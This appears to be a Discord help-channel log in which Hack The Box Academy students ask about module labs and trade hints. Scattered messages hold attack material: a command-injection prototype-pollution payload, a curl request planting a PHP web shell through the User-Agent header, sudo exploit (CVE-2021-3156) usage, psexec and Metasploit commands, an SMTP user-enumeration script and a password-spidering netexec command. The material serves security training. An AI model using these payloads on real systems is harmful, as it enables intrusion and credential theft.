Try restarting the lab or swapping VPNs

Hello guys, I am doing the whitebox attacks module and I am stucked on remote code execution section.

I am doing all the steps described and when I send the payload
{"__proto__":{"deviceIP":"127.0.0.1; whoami"}} to /update endpoint, I don't pollute the parameter as text is telling to me.

Thanks going to try that soon

Anyone could help with https://academy.hackthebox.com/module/51/section/1590 ?

Trying to use CVE-2021-3156 as the module explains, but popping this error: $ ./sudo-hax-me-a-sandwich
./sudo-hax-me-a-sandwich: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./sudo-hax-me-a-sandwich)

Hello

the binary you are using use a library that's not supported in your machine

How to talk in general

Yeah, I had to compile it on my attack host, since target host doesn't have gcc to compile it, that's the issue

Any ideas?

iirc there was a flag called -static

wait i'll check

I mean it doesn't make any sense that you explain how to compile it one way, but the target host for the exercise is not compatible and you don't explain any workaround on the module

gotta be comforatable with this in the academy , you are expected to do your own research

Hi please read #rules and follow #welcome to gain access to #general

ig this -static might work @long igloo

you mean for the sudo hax me a sandwich, not for the lib right? since the lib with -static throws an error

for the binay (hax me a sandwich)

not sure it gonna work

not working for me lol

this is stressful, and looking into the discord search bar shows me other people with the exact same error ffs

probably copy your libc.so.6 to the target

isn't nessus already installed in the pwnbox ?

No

This is because it requires a license to activate [there's a free one and a paid one]

Thanks for sharing that. I was going through the Vulnerability Assessment module, and for the Skill Check lab, I initially thought it was installed locally, so I tried to log in using localhost

Nope, its installed on the target

yeah i got that now

Hi, I'm kind of new to windows and I was wondering what are the prerequisites for the following command to work ?
psexec.py <USER>:'<PASS>'@<IP>
From what I understood, it needs the ADMIN$ share for the SMB protocol to be writeable by the user I try to log in as, am I right ?

That's correct

Perfect thanks !

Is there any other tool that enables us to get RCE on a windows machine through SMB if the ADMIN$ share is not writeable ?

Well you can always test for eternal blue or eternal romance but I'm not aware of any other method

Alright I get it thanks

Any idea why everything works when I inject using curl but I get a 500 error when I inject with Burp?

curl -s "http://94.237.48.12:43356/index.php" -H "User-Agent: injected<?php system(\$_GET['cmd']); ?>"

Can any1 pls help me with this question?

probably because bash is attempting to evaluate the symbols, use ' single quotes

The curl command is actually working and I get RCE through the web shell.

If I try the same with Burp I get the error message.

try a simpler command maybe? I'm confused as well now

How i join to team in ctf ?

#1318239802931286066

Show to me No Access
Please help me

Read #rules and follow instructions in #welcome

Were you able to get anything to work and the answer isn't correct or is nothing working?

hi!!! can you look at my smuggling request? because it works when i look myself, my cookie is logged (with my normal rerquest) but it seems the admin never hit the page.

I found it. It was the \ before the $_GET which I copied from the curl command 🙈

Can anyone help me in this question
By examining the logs located in the "C:\Logs\Dump" directory, determine if an ill-intended login took place after the LSASS dump. Answer format: Yes or No

Someone for a hint/help on the chapter "Exploitation of Request Smuggling" of "HTTP Attacks" modules.|| i have the http request smuggling. i can log any request on the site in the comment section, i tested on myself but the admin never vistit the site||

Yes

You can DM what you have and I can try to steer you in the right direction.

Thx

I figured out my flag… what a silly module question

Hi, I'm on the module "Cracking Passwords with Hashcat" on the page "Cracking Miscellaneous Files & Hashes", I have a strong difficult to solve the optionnal question withe vmx file to crack with hashcat. ? Could I have some help please

Pivoting Tunneling and Port Forwarding | Web Server Pivoting with RPivot

Transferred client.py to pivot host - get this error when trying to run it:

Traceback (most recent call last): File "client.py", line 12, in <module> import relay ImportError: No module named relay

Any ideas on how to fix / why? Please @ with responses

I'm stuck on Nmap Firewall and IDS/IPS Evasion - Hard Lab

I think I have pretty much tried everything so far, read modules 2 times but Idk what am I missing

I looked and I think the answer is stringFromJNI() but the system says it is an incorrect answer.

me 2

nvm i got it

Source-ports are your friend

Can anyone help me?

attacking common services module attacking ftp questions. Found a user and logged in but the flag and user is wrong

now can't install python2.7 on pwnbox [I have kali on a bare-metal install and when I tried originally I got the provided error above] any help would be great

resolved - didn't copy the whole folder and just did client.py

Hey guys. I'm working on the Skills Assessment on Introduction to Windows commandline and I'm stuck at this point to ssh into the target.

Is the password supposed to be an empty string or just empty. I've been trying both with no luck. Your help will be appreciated.

Each password for the next user is the previous answer

Hey does any admin / mod help me ?

With?

i talk with someone sorry for disturbing

What do you need help with?

i talk with someone sorry for disturbing

anyone know why I am having trouble spawning the machine for this task? it says "cannot spawn vip machines in non vip server". I have vip+

Change vpn region; also wrong channel to ask in

ahh mb, which channel should I ask in?

#general or #1024429874246590575

Is anyone available to help with Cross-Site Scripting (XSS) > Session HIjacking? The end of section question.
https://academy.hackthebox.com/module/103/section/1008

I have my cookie but can't seem to add it in the Storage tab. The instructions say to click the + and add our cookie. Clicking the + doesn't allow me to add anything.

When you click + it should add a blank field/value or a randomly generated field

And you can edit the name and value from that

Ahh, there we are. Thank you!

I'm a bit terrified of the Skills Assessment at the end of this module 🤣

Im having an issue with pwnbox bash, can someone help me?

Reach out to support on the website

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

the ai support thing told me to go here, or thats how I interpreted it atleast

If youre having problems with the pwnbox crashing: thats a platform issue that support can handle

oh no, its not that it crashes

its just a thing about bash that i dont understand

there's a module where i have to use sthe ssh command in pwnbox, and when i use it and it asks forr the password, the caret turns thick and white and i stop being able to type

Oh, it doesnt stop you from typing

It intentionally hides what you type, for security reasons

ohh

thank you, now it worked

like really, thanks a lot

This is why phrasing your question properly helps :)

Well to be fair, Patriot thought it was a bash problem, so original question was about that.
Then it was actually something else, that happens

im almost completely new

just a few weeks in

Well the og statement was phrased as a pwnbox issue

Welcome! And keep at it!

And originally, they said "crash" not bash

oh, I thought it was bash. Alright then.

i said pwnbox bash, but maybe thats not the right term

Close enough! You had a problem, asked for help, and got it. That's the important part. And to have fun!

Well bash is its own thing not specific to the pwnbox

Bash is just the language that the terminal uses to execute commands

Yes!

and it is quite fun, especially when you get past things that previously were difficult

Yes indeed! 🙂

i need some confirmation if the module answer for this section, is working fine : https://academy.hackthebox.com/module/257/section/3761

because i enter the answer in multiple ways and says is wrong, but i am not sure if i am wrong or the answer need a specific format to be taken like completed

solved, i was wrong

hey guys for the path Introduction to Threat Hunting & Hunting With Elastic >Threat Hunting With The Elastic Stack>Hunting for Stuxbot I have a real issue with the question #2
Stuxbot uploaded and executed mimikatz. Provide the process arguments (what is after .\mimikatz.exe, ...) as your answer.

I Actually think I got the path but is not getting accepted in the answer. Can someone help me with that?

Windows fundamentals

skills assessment, i cant view it at all

Hello,
Someone out there has done HTTP Attacks skill assessment, my CRLF is not working and I have HTTP smuggling working.
Some can help me please.

it should be a folder you're looking for unless that shortcut is supposed to contain sumn important

Hey guys hope everyone is having a great day, in the Footprinting module, in the SMTP section, the Question "Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer."

I tried to ask an ai to code a python script, which would use the usernames in the footprinting-usernames.txt given, and then output the valid usernames which i believe would not return a status code of 252, or 505. but for some rzn whenever i tried , it said connection refused.

So my question is, is there like a rate-limiting thingy which is on SMTP, or is that just a shit script from the Ai?

Thanks in advance

import argparse
import sys
import os

def check_smtp_user(server, port, username):
    """Check if a username is valid using SMTP VRFY command."""
    try:
        # Connect to the SMTP server
        smtp = smtplib.SMTP(server, port, timeout=5)
        # Send VRFY command
        code, message = smtp.verify(username)
        smtp.quit()
        # Check for 252 status code
        return code == 252, message.decode('utf-8') if isinstance(message, bytes) else message
    except (smtplib.SMTPConnectError, smtplib.SMTPServerDisconnected, ConnectionRefusedError):
        print(f"Error: Could not connect to {server}:{port}")
        return False, None
    except smtplib.SMTPException as e:
        print(f"SMTP error for {username}: {str(e)}")
        return False, None

def main():
    # Parse command-line arguments
    parser = argparse.ArgumentParser(description="Check usernames against an SMTP server using VRFY.")
    parser.add_argument("server", help="SMTP server address (e.g., mail.example.com or IP)")
    parser.add_argument("port", type=int, help="SMTP server port (e.g., 25)")
    parser.add_argument("username_file", help="Path to text file with usernames (one per line)")
    args = parser.parse_args()

    # Check if username file exists
    if not os.path.isfile(args.username_file):
        print(f"Error: Username file '{args.username_file}' not found.")
        sys.exit(1)

    # Output file for valid users
    output_file = "valid_users.txt"

    # Clear the output file if it exists
    with open(output_file, 'w') as f:
        f.write("")

    print(f"Checking usernames against SMTP server {args.server}:{args.port}...")

    # Read usernames and check each
    valid_users = []
    with open(args.username_file, 'r') as f:
        for username in f:
            username = username.strip()
            if not username:  # Skip empty lines
                continue
            is_valid, message = check_smtp_user(args.server, args.port, username)
            if is_valid:
                print(f"Valid user found: {username} (Response: {message})")
                valid_users.append(username)

    # Save valid users to output file
    with open(output_file, 'a') as f:
        for user in valid_users:
            f.write(f"{user}\n")

    # Display results
    if valid_users:
        print(f"\nValid usernames saved to {output_file}:")
        with open(output_file, 'r') as f:
            print(f.read().strip())
    else:
        print("No valid usernames found.")

    print("Done.")

if __name__ == "__main__":
    main()```

sorry if this looks like it floods the chat, but it would rlly help me if can someone tell me why it didnt work

I don't think this has been resolved yet. I followed the steps to install the WebDav redirector but I get an error saying that I don't have the "adequate user rights" to make the changes

There's already an enum script that exists

smtp-user-enum

oh i just took a look at it, it sums up everything i wanted

i just realized the ai script can work, but my dumbass didnt notice the target server ran out of time 💔 🥀

i sat for a whole hour switching between scripts just for that to be the issue

Introduction to Bash Scripting
Conditional Execution

not sure how to do this

It explicitly tells you what to do

Yes but i cant write code i can only read code

Im physically unable to do it

There's code given in the reading

You copy/paste and insert the condition where it tells you

Remote Code Execution (RCE) via the Theme Editor

Im not staff, and haven't done that module

Oh okay

I suggest focusing on one module at a time. Unless you finished up the bash module and moved on to the wp one

Did you edit the right theme 404?

Also that module is above t0, so avoid spoilers

Bash i havent finished, but im almost done with wordpress because i was previously almost done

with it, just trying tio get the ones i done out of the way halfway

CJCA is about to be taken in a weeks time

Yes

Apologies, i put a shell cmd in , do i have permission to post the shell cmd here?

The cmd looks right

yeah, not sure why it cant be executed

Hello all

uname -r gets the kernel release, correct?

Look at uname --help or uname -h to see the values

But also for that question: if youre getting "parrot..." youre not connected to the target machine

trying to work out why the module will not accept answer, and just read that

a bit annoying

It also helps to give the module name and section

LOL, of course but was doubting myself more than the module and section

Well if you give the module and section people are able to help you more with the expected format of the answer

understood, but I wanted to verify I was not typing in an incorrect command more than I was seeking help on a particular module question

ssh into worked

Ah, the classic issue of not reading the given instructions

excuse me?? The fact that the in browser instance exists infers that the user has a choice, there are instances where the user cannot use SSH, so will use the in browser. The is nothing in the instructions to say do not use, I mean why is it there?

keep the snark to yourself, please

This wasn't an attack on you, this is a common issue that people face

And ill repeat myself every time ig:
Spawn instance -> this starts the in-browser attack box
Click here to spawn target -> this spawns the target to attack/connect to
I believe this distinction is made in the Intro to academy module

skill assessment - wordpress attacks
Submit the contents of the flag file in the directory with directory listing enabled.

what does the word "directory listing" mean?

Visiting the endpoint lists the files instead of loading a webpage, essentially

Ah okay thank you

I.e. if you start a python web server, then visit in a browser -> you get the directory listed

hey everyone. I'm doing "Pentest in a Nutshell", section "Windows Enumeration" (https://academy.hackthebox.com/module/296/section/3402), and for some reason i can't get the right answer for: "What is the exact OS Version that WinPEAS delivers?" I've run different versions of winPEAS, used other commands, and its not accepting any variation of the exact OS. what am I missing?

Look at this section again "https://academy.hackthebox.com/module/195/section/2182" and try to identify which methods returns a string from native C++ back to Java.

What result did you get after running WinPEAS?\

||10.0.17763||

You're very close, however the result is incomplete. You need a full string.

That doesn't help. Ive copied and pasted many strings from the different winPEAS.

struggling with it still

The question asks the exact OS version which would follow this format like this:
<Version of Windows> <specific service pack, N/A if none> <Build> <Build number>

well that should be ||10.0.17763.2628|| which is still not being accepted

and ||Microsoft Windows Server 2019 Standard 10.0.17763.2628|| doesnt work lol.

You can dm me.

is there a default password for wordpress?

does anyone have a good wordlist to give me?

for which module?

no module but yes for personal use real tests

Hey may I get some help for the wordpress module on

Not the right channel to ask. Please read the #rules and follow the instructions in #welcome to gain access to other channels. This channel is for discussion of the various modules on Academy.

yes but I am Brazilian and my english is weak I still can not see how I do to access other channels

Follow the instructions in #welcome

Just ask for help in here, don't have to tag someone. Always say which module/section/question you're on, what you've tried, etc (make sure not to reveal contents of modules above tier 0)

How do I use the tools in termux tool X

Alright I need help with this if possible, i got the wordpress output results just not sure what to do next

Always say the module/section/question you're on

Looks like you just put the text of the flag in the field there.

Thats the thing i cant find it

Actually, i did a wordpress scan with wpscan but nothing appears for a flag value

Oh, you had said you found the output. Like I said earlier then, no need to tag people directly. Just say what module/section/question you're on.

for this question i havent

No one's going to scour each section of the module to find that question. You really should just include it in your initial post.

Alright i'll leave it till last

it is 5am for me so i should probabkly continue tomorrow

but you're just waking up

i havent slept

i been up all night grinding through the CJCA im like 80% done nearly

It's fine i'll have a go when im awake completing skills assessment

nice

get some sleep

hacker for hire it seems

Nope...

If you lost your robox account, this isn’t the place

Have a read of the #rules and then #welcome 🙂 if you need an ethical hacker, this channel definitely isn’t the place to ask

Self trained programmer and a web developer but it's seems difficult due to limited resources....just needed a bit assistance with some work..

Hope I'm breaking the rules in anyways

Not breaking the rules anyways..

Well, I suggest you go over the channels above and if you wanna learn, go to https://academy.hackthebox.com

Thanks....

i am currently on the setting up module visualization and to say the least i am lost . do i install proxmox or VirtualBox or do i install both

most of those are just showcasing various ways to setup vm's you can use.

you just need to pick one. i like vmware myself, but whatever works for you. you don't need to setup a vps etc.

are there any advantages or are they all the same

what is the one mostly used

personal preference and probably some features

vmware workstation pro is free now, proxmox is good

got thank you

Thank you. It worked.

The lab about "Exploitation of Request Smuggling" in the HTTP Attack module isnt working properly. i was confirmed that my smuggling request is the good one but the admin never visit the website so i can have his cookie posted where it must be. And please you must stop simulated http request smuggling labs, put the time it is needed to really implement a vulnerable lab

This isn't a hacker for hire server, go look for professionals in the industry through other means.

From the name it seems like it is a hacking community and what i mean from hiring is just helping me out or just be with me in the company. Anyways Thanks bro

We're a learning community specifically for the hack the box platform.

Great. It seems like you are too passionate about your things . So, can you please suggest me any community where i can find professional as I don’t know much about this app. New to the platform. Thankyou

Hey everyone please need a help . What other server is secure and fast for creaking a password and clone a password. I tried many but couldn't find a secure server .

Thanks in advance

I went through the code lines one by one. But I couldn't get anywhere. I think there was a bug on Hackthebox's side. I don't know how many hours I spent on this question, but thanks anyway.

im stuck at the introduction to assembly course skill assessment i managed to make the shellcode.o file now idk what to do next

for task 1

just link it using ld to make it an elf assuming you want to run it

google "make elf file from object files using ld/linker"

i make the file into .elf then run it?

im like 90% sure the academy module will have instructions on how to do it considering its supposed to teach you and all

yes i know where to find the command to make into elf im just asking if i must make into elf

if you want to run it, yeah

right ok

Try using request repeating to be able to quickly test commands. With that, try looking for the other how i solve this in Repeating Requests

module- SHELLS & PAYLOADS
PHP Web Shells

i have uploaded the webshell and its giving the wrong file type error as intended , but when i go into the burp to modify the request i cant find the particular request in which the shell is present . there is no post request in the list.?

Setting up
The multiplexer
Copied pasted .tmux.conf text and created a file and now my dock looks like this)
so my query is which nerd font should i install to fix the icons stuff

Hi

Contact local law enforcement, we can't help you

Ok

for the assembly introduction skill assessment task 1 do i have to run it in the server

In this section, look at the example code of Hello from C++, you'll find the answer there.
The following snippet of C++ code shows a function that returns the string Hello from C++.

.....

I found it, thank you. It's really nice to find it without going crazy, you're great.

https://academy.hackthebox.com/module/112/section/1080 Can anyone give me some advice on this topic? I have no idea. I just scanned what ports are open and tried to connect, and entered the account and password. Regardless of whether it is a real username or not, the result returned is the same.

I recommend to go through the section one more time before moving on.

Guys hello If I cancel current subscription will modules opened by it get closed?

Only modules you haven't completed afaik

so if the module isn't completed it will get closed?

I believe so. It's best to reach out to support to confirm

Hi, I have this same issue, probably just being a silly goose but can anyone give me a hint?

Hacking WordPress
Skills assessment

Well im in the LFI vulnerable plugin and im not able to make changes to the website plugin code

make sure you edit the right 404.php page

Hey how did you get around this? I also don't know what to do once I've found the three ports XD

there is no 404.php page

for the plugin file

Guys who has completed WPA2 module of HTB what to do if the reaver is waiting for very long

?

can someone give me a nudge , i figured the LFI vuln but it doesnt let me read the file with users in

"Sorry, that file cannot be edited."

Still stuck on Windows Privilege Escalation Pillaging path for CPTS on HTB academy I cant login into slack I got the cookie for the user but doesn't work it base 64 encoded it for the user grace pls help been stuck for a week on this question

I don't remember it well but .. I got the same error then what I did was made the lfi trigger when I visited a 404 page.

I see

so there's a 404 page somewhere hmm

Dm me

Need some help with Windows Privilege Escalation - Windows Server.

My Metasploit is telling me that the bind is failing because the ip:port is either in use or unavailable:

||msf6 exploit(windows/smb/smb_delivery) > [-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (10.129.133.121:445).||

Might wanna check for services running on the port then.

I already did, it says that PID 4 is listening in on it and the processname is System

Are you using the pwnbox? If so it might be using that, might wanna result to another method to gain the meterpreter shell

I am using my own vm

Run msfconsole with sudo maybe

I already ran it as root

I'd just swap to a different shell method, you can still escalate with any form of meterpreter session

Ah alright, will try another method then

Attacking WPA/WPA2 Wi-Fi Networks has someone completed this module and what to do if reaver works very slow?

Sorry to bother you guys, I have a small question. Is there any connection between the three labs in a module: Easy, Medium, Hard? Just like the footprinting module.

what you mean in connections?

Related

For example, the data in the simple lab can also be used in the medium

Typically no

Also the footprinting labs arent necessarily as connected as you think

OK, thank you. But I have no idea for the last hard part of the footprinting module. Do you have any idea?

hard lab

Im not at home today to check my notes, I dont recall if thats the one with important.txt

No, the important.txt is on Medium

Then I dont have that one in memory

Have you tried scanning UDP?

I tried -A

Hi guys

That doesnt scan UDP

Register an account? That doesnt sound familiar to that one

Pretty sure he's referring to the mail service

yes

Still doesnt make sense 😉

He never mentioned register simply that he tried to auth

Ah, brain is mush

My brain combined regardless and entered somehow

But you should be able to find a real user/pass

Scan UDP and use the techniques for footprinting the service you found

No brute forcing (of the mail service) required

Hey, i am in the AEN module and im trying to conduct port forwarding to get a reverse shell back to my host from dev01 with ligolo, can someone please assist me setting up the listener with ligolo ? for some reason i cannot get the shell back ^^

If you read the engagement brief (the paragraph above the lab) you should be able to figure it out

I use chatgpt, and it keeps asking me to brute force it

Listener should point back to you, a:1234 -> you:4321, ligolo connect to a:1234

Because you overlooked a port

can I pleasepleaseplease DM you with a snippet 🙂 ?

Im not at my home today to do troubleshooting

But the biggest part of AEN should be learning to unstick yourself

Look to and read documentation and double pivot guides

Im assuming youre doing AEN blind as well

yes sir !

What does this role that I currently have mean?

HTB Certified Hyphen Specialist

-_-

what is this?

Minor

oh how did you know i'm minor 😦

The hyphen

:)

and how HTB know my age 😂

Because you filled out the form?

Lmao

The parental consent form

Only staff can assign it, not mods

I got really scared I hope HackTheBox didn't ban me!

yep 🙂

Only certain staff have access to view the uploaded form, and they assign that role manually to help keep track of users. That way if you say something, and dont have the role, then someone will double check then prompt you to fill out the form and send it in

Due to HTB ToS stuff

oh

nice

hats off to hackthebox

is the 3rd skill assessment on attacking common applications supposed to be as easy as using the type command?

The hard assessments often seem in the wrong order

yeah lol, i mentally prepared myself for war but had it completed in like 5 minutes

i feel it

thick client app...

yeah FUCK that section

I'm sooo closeeeeeeee

I just got to footprinting, and honestly, feels like I’m almost done with this whole thing!

Ok. Struggling with "Web services and API attacks" final assessment. Am i supposed to be sending requests to http://target:port/wsdl?wsdl

Like, is that the correct endpoint? Or am i missing something?

What does this have to do with #modules?

Sorry

Really sorry

@near sierra Please read the #rules and follow the instructions in #welcome to gain access to more appropriate channels.

Bro, i wish you luck.
This is my face before and after the penetration tester pathway. Hell, even the windows priv esc & active directory was enough.

if ur just starting it i pity you, ive been at it for 3 days because of how boring it is

I hate enumeration 😔

But, its important to know anyway

i try to motivate myself because i know active directory enumeration is even more boring

Sorry @uneven obsidian I did not give permission to dm

Hi, just started the CPTS track and racking my head on Nibbles 🙄 (yeah, I know). I can work through everything except the privilege escalation. I have tried multiple scripts in my monitor.sh, but it always prompts me for the password of the 'nibbler' user, sudo -l looks good. I have tried resetting the machines and following different walkthroughs, but I always get prompted. Any clue what I am missing?

Use the full path

Hi guys, I'm stuck on the Password Attacks - Skills Assessment
I've logged in to the DMZ, found some creds (don't know what to do with them), did pivoting using chisel

But when i tried to scan using nmap from my machine, it doesn't give the expected output. But at the same time, if run nmap from DMZ, I see the ports.

Is this expected behavior or am i missing something ?

If using proxychains, icmp hates proxychains

I've given -Pn in both the nmap commands

¯_(ツ)_/¯

I used nxc to spray around

Yup, I'm trying that, but I'm not sure if proxychains is working or not. As there is no way to verify

man just use ligolo for pivoting

Sure, will try that

Marcie in WPA2 attacks module is it possible that on target one can't capture full handshake when doing 4 way handshake capture?

I haven't done that module

understand

i changed several targets on previous task until the target worked normally

Hi guys, I tried using ligolo, but while doing nmap scan, in the ligolo terminal, all nmap requests are getting the same error CONNECTION REFUSED. Is it that the host is blocking the nmap requests ?

nevermind, I'm just dumb, got the requests

Lol

That's it...so simple, but it worked, thank you. Didn't realize you needed the full path, but now I do.

Well, i found some creds (hw.....) and tried conecting to the open services on F01, but not getting logged-in. Can anyone give any hints on where I can use it ?

Typically, when sudo specifies a full path; use full path

Think of the type of server F could be

So maybe its not used for some services but you can authenticate on others 😉

Can I DM you, if you don't mind ?

Im not at home, and likely won't be available until tomorrow. Im just relaying what I recall from recently redoing it

Sure, I won't actually be asking you to solve it, just need to share info

Im aware, im telling you im at limited capacity

Im at a party for my mom's bday

Ohh okay then no worries, thanks for your help 🫡

<@&861185840277487616> spam bot

above me

ty

Someone who finished the AEN module and can assist me with doing the port forwarding with Ligolo?
I managed to do it with ssh port forwarding but I want to try more methods.

I will shared detailed snippets and explanations in DM

Happy birthday to your mum! 🎉 Hope you all have a great time!

Solving the Password Attack - Skill Assessment, I've found where the creds are used in F01, found some other usernames as well, but the files which I thought might be interesting is just the HTB staff messing with me. Can someone DM as can't disclose information here

anyone wants to get into blue teaming hit me up im putting something together for people starting out / wanting to start in cyber

i am in bash scripting and stuck on this question

var='8dm7KsjU28B7v621Jls'
value='ERmFRMVZ0U2paTlJYTkxDZz09Cg'

for i in {1..40}
do
  var=$(echo $var | base64)

  if [[ $var == *$value* ]] && [ ${#var} -ge 113469 ]; then
        echo ${var: -20}
  fi
done ```

here's my code

Guys hello has anyone done Attacking WPA/WPA2 Wi-Fi Networks

if someone has done pls contact me

Are you looking for accessing a local port?

I’m looking to get a reverse shell on the internal network from my attack host

Guys hello has anyone done Attacking WPA/WPA2 Wi-Fi Networks if someone has done pls contact me

So I need to use dmz01 host as a jump server

A pivot? Jump server means something, so i just want to be sure I'm tracking.

Yep

Can I DM you with screenshots ?

Yeah you can DM

I'm in Credential Hunting in Network Shares - I'm getting no results from netexec when spidering the remote share: nxc smb 10.129.239.172 -u user -p pass --spider \\path\to\share --content --pattern "passw"

It just says "Done spidering", and dumps me back to a prompt.

Any idea what's going on?

You can DM what you are trying.